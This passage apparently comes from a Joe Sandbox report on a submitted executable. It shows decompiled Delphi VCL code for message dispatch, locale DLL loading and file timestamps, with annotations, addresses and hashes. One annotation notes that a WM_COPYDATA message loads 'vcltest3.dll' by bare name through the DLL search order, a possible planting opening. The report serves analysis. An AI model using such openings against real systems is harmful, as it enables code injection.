                                                     								if(_t231 == 0x100) { // 0xf020 + 0x100 = 0xf120 = SC_RESTORE
                                                     									E0045A104(_v8); // SC_RESTORE handler
                                                     								} else {
                                                     									E004598AC(_t377); // Default
                                                    								}
                                                    							}
                                                    							goto L102;
                                                    						}
                                                     						_t239 = _t227 + 0xffffffe0 - 7; // Msg - 0x132, then an unsigned compare against 7 (the decompiler renders the jb as "< 0")
                                                     						__eflags = _t239;
                                                     						if(_t239 < 0) { // 0x132..0x138 = WM_CTLCOLORMSGBOX..WM_CTLCOLORSTATIC
                                                     							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8)); // reflect to the child window in LParam as CN_BASE (0xbc00) + Msg
                                                    							goto L102;
                                                    						}
                                                     						__eflags = _t239 == 0x1e1;
                                                     						if(_t239 == 0x1e1) { // 0x139 + 0x1e1 = 0x31a = WM_THEMECHANGED
                                                    							_t247 = E004329D8(E004328F8());
                                                    							__eflags = _t247;
                                                    							if(_t247 != 0) {
                                                    								E00432A34(E004328F8());
                                                    							}
                                                    							goto L102;
                                                    						} else {
                                                    							goto L101;
                                                    						}
                                                    					}
                                                     					if(__eflags == 0) { // 0x53 = WM_HELP
                                                     						goto L89;
                                                    					}
                                                    					__eflags = _t161 - 0x16;
                                                    					if(__eflags > 0) {
                                                    						__eflags = _t161 - 0x1d;
                                                    						if(__eflags > 0) {
                                                     							_t250 = _t161 - 0x37; // 0x37 = WM_QUERYDRAGICON
                                                     							__eflags = _t250;
                                                     							if(_t250 == 0) {
                                                     								 *(_v12 + 0xc) = E0045A038(_v8); // Result := the application's icon handle
                                                    								goto L102;
                                                    							}
                                                     							__eflags = _t250 == 0x13;
                                                     							if(_t250 == 0x13) { // 0x37 + 0x13 = 0x4a = WM_COPYDATA
                                                     								_t254 = _v12;
                                                     								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454; // LParam -> COPYDATASTRUCT; only dwData == 0xde534454 is acted on
                                                     								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
                                                    									_t256 = _v8;
                                                    									__eflags =  *((char*)(_t256 + 0x9e));
                                                    									if( *((char*)(_t256 + 0x9e)) != 0) {
                                                    										_t257 = _v8;
                                                    										__eflags =  *(_t257 + 0xa0);
                                                    										if( *(_t257 + 0xa0) != 0) {
                                                    											 *(_v12 + 0xc) = 0;
                                                    										} else {
                                                     											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000); // VCL test-automation hook: LoadLibrary wrapper, error mode 0x8000 = SEM_NOOPENFILEERRORBOX. The module is given by bare file name, so it resolves through the process's standard DLL search order
                                                    											 *(_v8 + 0xa0) = _t314;
                                                    											__eflags = _t314;
                                                    											if(_t314 == 0) {
                                                     												 *(_v12 + 0xc) = GetLastError(); // load failed: Result := the Win32 error code
                                                    												 *(_v8 + 0xa0) = 0;
                                                    											} else {
                                                    												 *(_v12 + 0xc) = 0;
                                                     												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation"); // resolve the DLL's RegisterAutomation export
                                                     												_t315 = _t375;
                                                     												__eflags = _t375;
                                                     												if(_t375 != 0) {
                                                     													_t269 =  *(_v12 + 8);
                                                     													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8))); // RegisterAutomation(cbData, lpData): the sender-supplied length and buffer that follow dwData in the COPYDATASTRUCT
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L102;
                                                    							} else {
                                                    								goto L101;
                                                    							}
                                                    						}
                                                     					if(__eflags == 0) { // 0x1d = WM_FONTCHANGE
                                                     						_t272 =  *0x49ebbc; // 0x0
                                                     						E00458DEC(_t272); // Screen.GetMetricSettings on the global at 0x49ebbc
                                                     						E004598AC(_t377); // Default
                                                    							goto L102;
                                                    						}
                                                     					_t275 = _t161 - 0x1a; // 0x1a = WM_SETTINGCHANGE (WM_WININICHANGE)
                                                     					__eflags = _t275;
                                                     					if(_t275 == 0) {
                                                     						_t276 =  *0x49ddb0; // 0x49eb18
                                                     						E00445ED0( *_t276, _t317,  *(_v12 + 4)); // Mouse.SettingChanged(WParam) on the global at 0x49ddb0; the settings-change notification follows, then Default
                                                    							E00459840(_v8, _t308, _t317, _v12, _t370);
                                                    							E004598AC(_t377);
                                                    							goto L102;
                                                    						}
                                                     					__eflags = _t275 == 2;
                                                     					if(_t275 == 2) { // 0x1a + 2 = 0x1c = WM_ACTIVATEAPP
                                                     						E004598AC(_t377); // Default first
                                                     						_t284 = _v12;
                                                     						__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
                                                     						asm("sbb eax, eax");
                                                     						 *((char*)(_v8 + 0x9d)) = _t284 + 1; // FActive := WParam <> 0 (cmp / sbb eax,eax / inc eax idiom)
                                                     						_t286 = _v12;
                                                     						__eflags =  *(_t286 + 4);
                                                     						if( *(_t286 + 4) == 0) {
                                                     							E0045973C(); // NormalizeTopMosts
                                                     							PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); // PostMessage(FHandle, CM_DEACTIVATE, 0, 0)
                                                     						} else {
                                                     							E0045974C(_v8); // RestoreTopMosts
                                                     							PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); // PostMessage(FHandle, CM_ACTIVATE, 0, 0)
                                                    							}
                                                    							goto L102;
                                                    						} else {
                                                    							goto L101;
                                                    						}
                                                    					}
                                                     					if(__eflags == 0) { // 0x16 = WM_ENDSESSION
                                                     						_t297 = _v12;
                                                     						__eflags =  *(_t297 + 4);
                                                     						if( *(_t297 + 4) != 0) {
                                                     							 *((char*)(_v8 + 0x9c)) = 1; // session really ending (WParam <> 0): set the terminate flag
                                                    						}
                                                    						goto L102;
                                                    					}
                                                     					__eflags = _t161 - 0x14; // messages 0x00..0x14 go through the jump table at M004599D8; anything else left over falls to Default at L101
                                                     					if(_t161 > 0x14) {
                                                    						goto L101;
                                                    					}
                                                    					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
                                                    						case 0:
                                                    							0 = E004214B8(0, __ebx, __edi, __esi);
                                                    							goto L102;
                                                    						case 1:
                                                    							goto L101;
                                                    						case 2:
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0xb01a);
                                                    							_v8 =  *(_v8 + 0x30);
                                                    							_push( *(_v8 + 0x30));
                                                    							L00407848();
                                                    							__eax = E004598AC(__ebp);
                                                    							goto L102;
                                                    						case 3:
                                                    							__eax = _v12;
                                                    							__eflags =  *(__eax + 4);
                                                    							if( *(__eax + 4) == 0) {
                                                    								__eax = E004598AC(__ebp);
                                                    								__eax = _v8;
                                                    								__eflags =  *(__eax + 0xac);
                                                    								if( *(__eax + 0xac) == 0) {
                                                    									__eax = _v8;
                                                    									__eax =  *(_v8 + 0x30);
                                                    									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                    									__edx = _v8;
                                                    									 *(_v8 + 0xac) = __eax;
                                                    								}
                                                    								_v8 = L00459744();
                                                    							} else {
                                                    								_v8 = E0045974C(_v8);
                                                    								__eax = _v8;
                                                    								__eax =  *(_v8 + 0xac);
                                                    								__eflags = __eax;
                                                    								if(__eax != 0) {
                                                    									__eax = _v8;
                                                    									__edx = 0;
                                                    									__eflags = 0;
                                                    									 *(_v8 + 0xac) = 0;
                                                    								}
                                                    								__eax = E004598AC(__ebp);
                                                    							}
                                                    							goto L102;
                                                    						case 4:
                                                    							__eax = _v8;
                                                    							__eax =  *(_v8 + 0x30);
                                                    							_push(__eax);
                                                    							L004077A8();
                                                    							__eflags = __eax;
                                                    							if(__eax == 0) {
                                                    								__eax = E004598AC(__ebp);
                                                    							} else {
                                                    								__eax = E004598E8(__ebp);
                                                    							}
                                                    							goto L102;
                                                    						case 5:
                                                    							__eax = _v8;
                                                    							__eax =  *(_v8 + 0x44);
                                                    							__eflags = __eax;
                                                    							if(__eax != 0) {
                                                    								__eax = E00456FEC(__eax, __ecx);
                                                    							}
                                                    							goto L102;
                                                    						case 6:
                                                    							__eax = _v12;
                                                    							 *_v12 = 0x27;
                                                    							__eax = E004598AC(__ebp);
                                                    							goto L102;
                                                    					}
                                                    				} else {
                                                    					_t316 = _t306 + 1;
                                                    					_t376 = 0;
                                                    					L2:
                                                    					L2:
                                                     					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) { // TWindowHook(FWindowHooks[_t376]^)(Message): a hook that returns True ends dispatch here
                                                    						goto L4;
                                                    					} else {
                                                    						_t166 = 0;
                                                    						_pop(_t366);
                                                    						 *[fs:eax] = _t366;
                                                    					}
                                                    					L103:
                                                    					return _t166;
                                                    					L4:
                                                    					_t376 = _t376 + 1;
                                                    					_t316 = _t316 - 1;
                                                    					__eflags = _t316;
                                                    					if(_t316 != 0) {
                                                    						goto L2;
                                                    					}
                                                    					goto L5;
                                                    				}
                                                    			}

                                                     Instruction addresses for the listing above (a side column aligned line by line with the decompiled code in the original report view): 0x00459934 0x0045993b 0x0045993d 0x00459940 0x00459945 0x00459946 0x0045994b 0x0045994e 0x00459956 0x00459965 0x00459968 0x0045999c 0x004599a2 0x004599aa 0x004599ac 0x004599ae 0x004599b1 0x00459a65 0x00459a6a 0x00459abb 0x00459ac0 0x00459ae1 0x00459ae1 0x00459ae6 0x00459f56 0x00459f59 0x00459f5d 0x00459f79 0x00459f5f 0x00459f6b 0x00459f6b 0x00459fe4 0x00459fe4 0x00459fe6 0x00459fe9 0x00000000 0x00459fe9 0x00459aef 0x00459af2 0x00459db1 0x00459af8 0x00459fdd 0x00459fde 0x00459fe3 0x00000000 0x00459af2 0x00459ac2 0x00459f1d 0x00459f20 0x00459f24 0x00459f4c 0x00459f26 0x00459f34 0x00459f34 0x00000000 0x00459f24 0x00459ac8 0x00459ac8 0x00459acd 0x00459ecb 0x00459ed0 0x00459ed2
                                                    0x00459ed8
                                                    0x00459edd
                                                    0x00459ee0
                                                    0x00459ee3
                                                    0x00459eeb
                                                    0x00459ef0
                                                    0x00459ef2
                                                    0x00459ef9
                                                    0x00459ef9
                                                    0x00459ef2
                                                    0x00459ee3
                                                    0x00000000
                                                    0x00459ed2
                                                    0x00459ad3
                                                    0x00459ad6
                                                    0x00459f03
                                                    0x00459f13
                                                    0x00000000
                                                    0x00459adc
                                                    0x00000000
                                                    0x00459adc
                                                    0x00459ad6
                                                    0x00459a6c
                                                    0x00459dde
                                                    0x00459de1
                                                    0x00459de3
                                                    0x00459de9
                                                    0x00459ded
                                                    0x00459df2
                                                    0x00459df4
                                                    0x00459e02
                                                    0x00459e07
                                                    0x00459e09
                                                    0x00459e17
                                                    0x00459e1c
                                                    0x00459e1e
                                                    0x00459e24
                                                    0x00459e2b
                                                    0x00459e3a
                                                    0x00459e53
                                                    0x00459e59
                                                    0x00459e5e
                                                    0x00459e68
                                                    0x00459e68
                                                    0x00459e1e
                                                    0x00459e09
                                                    0x00459df4
                                                    0x00000000
                                                    0x00459de3
                                                    0x00459a72
                                                    0x00459a77
                                                    0x00459aa2
                                                    0x00459aa2
                                                    0x00459aa7
                                                    0x00459e9c
                                                    0x00459e9f
                                                    0x00459ea7
                                                    0x00459eb9
                                                    0x00459eb9
                                                    0x00000000
                                                    0x00459ea7
                                                    0x00459aad
                                                    0x00459ab0
                                                    0x00459dbf
                                                    0x00459dc4
                                                    0x00459dc6
                                                    0x00459dcf
                                                    0x00459dcf
                                                    0x00000000
                                                    0x00459ab6
                                                    0x00000000
                                                    0x00459ab6
                                                    0x00459ab0
                                                    0x00459a79
                                                    0x00459e74
                                                    0x00459e77
                                                    0x00459e7f
                                                    0x00459e91
                                                    0x00459e91
                                                    0x00000000
                                                    0x00459e7f
                                                    0x00459a7f
                                                    0x00459a7f
                                                    0x00459a84
                                                    0x00459b08
                                                    0x00459b08
                                                    0x00459b0d
                                                    0x00459b1b
                                                    0x00459b0f
                                                    0x00459b0f
                                                    0x00459b14
                                                    0x00459b28
                                                    0x00459b16
                                                    0x00459b33
                                                    0x00459b38
                                                    0x00459b14
                                                    0x00000000
                                                    0x00459b0d
                                                    0x00459a89
                                                    0x00459a89
                                                    0x00459a8c
                                                    0x00459cc0
                                                    0x00000000
                                                    0x00459cc0
                                                    0x00459a92
                                                    0x00459a97
                                                    0x00459fbf
                                                    0x00459fc4
                                                    0x00459fc6
                                                    0x00459fcd
                                                    0x00459fcd
                                                    0x00000000
                                                    0x00459a9d
                                                    0x00000000
                                                    0x00459a9d
                                                    0x00459a97
                                                    0x004599b7
                                                    0x00000000
                                                    0x00000000
                                                    0x004599bd
                                                    0x004599c0
                                                    0x00459a2c
                                                    0x00459a2f
                                                    0x00459a4e
                                                    0x00459a4e
                                                    0x00459a51
                                                    0x00459b9e
                                                    0x00000000
                                                    0x00459b9e
                                                    0x00459a57
                                                    0x00459a5a
                                                    0x00459ce4
                                                    0x00459cea
                                                    0x00459cf0
                                                    0x00459cf6
                                                    0x00459cf9
                                                    0x00459d00
                                                    0x00459d06
                                                    0x00459d09
                                                    0x00459d10
                                                    0x00459d90
                                                    0x00459d12
                                                    0x00459d21
                                                    0x00459d26
                                                    0x00459d2c
                                                    0x00459d2e
                                                    0x00459d78
                                                    0x00459d80
                                                    0x00459d30
                                                    0x00459d35
                                                    0x00459d4c
                                                    0x00459d4e
                                                    0x00459d50
                                                    0x00459d52
                                                    0x00459d5b
                                                    0x00459d69
                                                    0x00459d69
                                                    0x00459d52
                                                    0x00459d2e
                                                    0x00459d10
                                                    0x00459d00
                                                    0x00000000
                                                    0x00459a60
                                                    0x00000000
                                                    0x00459a60
                                                    0x00459a5a
                                                    0x00459a31
                                                    0x00459fa7
                                                    0x00459fac
                                                    0x00459fb2
                                                    0x00000000
                                                    0x00459fb7
                                                    0x00459a37
                                                    0x00459a37
                                                    0x00459a3a
                                                    0x00459f87
                                                    0x00459f8e
                                                    0x00459f99
                                                    0x00459f9f
                                                    0x00000000
                                                    0x00459fa4
                                                    0x00459a40
                                                    0x00459a43
                                                    0x00459bc8
                                                    0x00459bce
                                                    0x00459bd1
                                                    0x00459bd5
                                                    0x00459bdb
                                                    0x00459be1
                                                    0x00459be4
                                                    0x00459be8
                                                    0x00459c0f
                                                    0x00459c24
                                                    0x00459bea
                                                    0x00459bed
                                                    0x00459c02
                                                    0x00459c02
                                                    0x00000000
                                                    0x00459a49
                                                    0x00000000
                                                    0x00459a49
                                                    0x00459a43
                                                    0x004599c2
                                                    0x00459cc8
                                                    0x00459ccb
                                                    0x00459ccf
                                                    0x00459cd8
                                                    0x00459cd8
                                                    0x00000000
                                                    0x00459ccf
                                                    0x004599c8
                                                    0x004599cb
                                                    0x00000000
                                                    0x00000000
                                                    0x004599d1
                                                    0x00000000
                                                    0x00459fd6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00459ba6
                                                    0x00459ba8
                                                    0x00459baa
                                                    0x00459bb2
                                                    0x00459bb5
                                                    0x00459bb6
                                                    0x00459bbc
                                                    0x00000000
                                                    0x00000000
                                                    0x00459c2e
                                                    0x00459c31
                                                    0x00459c35
                                                    0x00459c69
                                                    0x00459c6f
                                                    0x00459c72
                                                    0x00459c79
                                                    0x00459c7b
                                                    0x00459c7e
                                                    0x00459c81
                                                    0x00459c86
                                                    0x00459c89
                                                    0x00459c89
                                                    0x00459c92
                                                    0x00459c37
                                                    0x00459c3a
                                                    0x00459c3f
                                                    0x00459c42
                                                    0x00459c48
                                                    0x00459c4a
                                                    0x00459c51
                                                    0x00459c54
                                                    0x00459c54
                                                    0x00459c56
                                                    0x00459c56
                                                    0x00459c5d
                                                    0x00459c62
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b56
                                                    0x00459b59
                                                    0x00459b5c
                                                    0x00459b5d
                                                    0x00459b62
                                                    0x00459b64
                                                    0x00459b73
                                                    0x00459b66
                                                    0x00459b67
                                                    0x00459b6c
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b3e
                                                    0x00459b41
                                                    0x00459b44
                                                    0x00459b46
                                                    0x00459b4c
                                                    0x00459b4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00459b7e
                                                    0x00459b81
                                                    0x00459b88
                                                    0x00000000
                                                    0x00000000
                                                    0x0045996a
                                                    0x0045996a
                                                    0x0045996b
                                                    0x00000000
                                                    0x0045996d
                                                    0x00459989
                                                    0x00000000
                                                    0x0045998b
                                                    0x0045998b
                                                    0x0045998d
                                                    0x00459990
                                                    0x00459990
                                                    0x0045a003
                                                    0x0045a009
                                                    0x00459998
                                                    0x00459998
                                                    0x00459999
                                                    0x00459999
                                                    0x0045999a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0045999a

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                    • API String ID: 0-2963190186
                                                    • Opcode ID: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                    • Opcode Fuzzy Hash: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 61%
                                                    			E004062DC() {
                                                    				void* _t28;
                                                    				void* _t30;
                                                    				struct HINSTANCE__* _t36;
                                                    				struct HINSTANCE__* _t42;
                                                    				char* _t51;
                                                    				void* _t52;
                                                    				struct HINSTANCE__* _t59;
                                                    				void* _t61;
                                                    
                                                    				_push(0x105);
                                                    				_push( *((intOrPtr*)(_t61 - 4)));
                                                    				_push(_t61 - 0x11d);
                                                    				L0040131C();
                                                    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                    				_t59 = 0;
                                                    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                    					L14:
                                                    					return _t59;
                                                    				} else {
                                                    					_t28 = _t61 - 0x11d;
                                                    					_push(_t28);
                                                    					L00401324();
                                                    					_t51 = _t28 + _t61 - 0x11d;
                                                    					L5:
                                                    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                    						_t51 = _t51 - 1;
                                                    						goto L5;
                                                    					}
                                                    					_t30 = _t61 - 0x11d;
                                                    					if(_t51 != _t30) {
                                                    						_t52 = _t51 + 1;
                                                    						if( *((char*)(_t61 - 0x12)) != 0) {
                                                    							_push(0x105 - _t52 - _t30);
                                                    							_push(_t61 - 0x12);
                                                    							_push(_t52);
                                                    							L0040131C();
                                                    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                    						}
                                                    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                    							_push(0x105 - _t52 - _t61 - 0x11d);
                                                    							_push(_t61 - 0xd);
                                                    							_push(_t52);
                                                    							L0040131C();
                                                    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                    							_t59 = _t36;
                                                    							if(_t59 == 0) {
                                                    								 *((char*)(_t61 - 0xb)) = 0;
                                                    								_push(0x105 - _t52 - _t61 - 0x11d);
                                                    								_push(_t61 - 0xd);
                                                    								_push(_t52);
                                                    								L0040131C();
                                                    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                    								_t59 = _t42;
                                                    							}
                                                    						}
                                                    					}
                                                    					goto L14;
                                                    				}
                                                    			}

                                                    APIs
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1599918012-2375825460
                                                    • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                    • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004099E0(void* __eax) {
                                                    				short _v6;
                                                    				short _v8;
                                                    				struct _FILETIME _v16;
                                                    				struct _WIN32_FIND_DATAA _v336;
                                                    				void* _t16;
                                                    
                                                    				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
                                                    				if(_t16 == 0xffffffff) {
                                                    					L3:
                                                    					_v8 = 0xffffffff;
                                                    				} else {
                                                    					FindClose(_t16);
                                                    					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                                    						goto L3;
                                                    					} else {
                                                    						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                                    						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _v8;
                                                    			}
                                                    0x004099fb
                                                    0x00409a03
                                                    0x00409a39
                                                    0x00409a39
                                                    0x00409a05
                                                    0x00409a06
                                                    0x00409a12
                                                    0x00000000
                                                    0x00409a14
                                                    0x00409a1f
                                                    0x00409a37
                                                    0x00000000
                                                    0x00000000
                                                    0x00409a37
                                                    0x00409a12
                                                    0x00409a47

                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                    • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                                    • String ID:
                                                    • API String ID: 2659516521-0
                                                    • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                    • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E0043F118(void* __eax, intOrPtr* __edx) {
                                                    				char _v20;
                                                    				char _v28;
                                                    				void* __edi;
                                                    				intOrPtr _t17;
                                                    				void* _t19;
                                                    				void* _t21;
                                                    				void* _t23;
                                                    				void* _t32;
                                                    				void* _t39;
                                                    				void* _t45;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t48;
                                                    				void* _t50;
                                                    				void* _t51;
                                                    				void* _t65;
                                                    				intOrPtr* _t66;
                                                    				intOrPtr* _t68;
                                                    				void* _t69;
                                                    
                                                    				_t68 = __edx;
                                                    				_t50 = __eax;
                                                    				_t17 =  *__edx;
                                                    				_t69 = _t17 - 0x84;
                                                    				if(_t69 > 0) {
                                                    					_t19 = _t17 + 0xffffff00 - 9;
                                                    					if(_t19 < 0) {
                                                    						_t21 = E0043B6EC(__eax);
                                                    						if(_t21 != 0) {
                                                    							L28:
                                                    							return _t21;
                                                    						}
                                                    						L27:
                                                    						_t23 = E0043C1FC(_t50, _t68); // executed
                                                    						return _t23;
                                                    					}
                                                    					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                    						_t21 = E0043F084(__eax, _t51, __edx);
                                                    						if(_t21 == 0) {
                                                    							goto L27;
                                                    						}
                                                    						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                                    							goto L28;
                                                    						}
                                                    						_t21 = E00441A08(_t50);
                                                    						if(_t21 == 0) {
                                                    							goto L28;
                                                    						}
                                                    						_push( *((intOrPtr*)(_t68 + 8)));
                                                    						_push( *((intOrPtr*)(_t68 + 4)));
                                                    						_push( *_t68);
                                                    						_t32 = E00441704(_t50);
                                                    						_push(_t32);
                                                    						L00407540();
                                                    						return _t32;
                                                    					}
                                                    					goto L27;
                                                    				}
                                                    				if(_t69 == 0) {
                                                    					_t21 = E0043C1FC(__eax, __edx);
                                                    					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                    						goto L28;
                                                    					}
                                                    					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                    					E0043AAC0(_t50,  &_v28,  &_v20);
                                                    					_t21 = E0043EFF0(_t50, 0,  &_v28, _t65, 0);
                                                    					if(_t21 == 0) {
                                                    						goto L28;
                                                    					}
                                                    					 *((intOrPtr*)(_t68 + 0xc)) = 1;
                                                    					return _t21;
                                                    				}
                                                    				_t39 = _t17 - 7;
                                                    				if(_t39 == 0) {
                                                    					_t66 = E004519E0(__eax);
                                                    					if(_t66 == 0) {
                                                    						goto L27;
                                                    					}
                                                    					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
                                                    					if(_t21 == 0) {
                                                    						goto L28;
                                                    					}
                                                    					goto L27;
                                                    				}
                                                    				_t21 = _t39 - 1;
                                                    				if(_t21 == 0) {
                                                    					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                    						goto L28;
                                                    					}
                                                    				} else {
                                                    					if(_t21 == 0x17) {
                                                    						_t45 = E00441704(__eax);
                                                    						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
                                                    							_t47 =  *0x49bce0; // 0x0
                                                    							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                    								_t48 =  *0x49bce0; // 0x0
                                                    								E0043C130(_t48, 0, 0x1f, 0);
                                                    							}
                                                    						}
                                                    					}
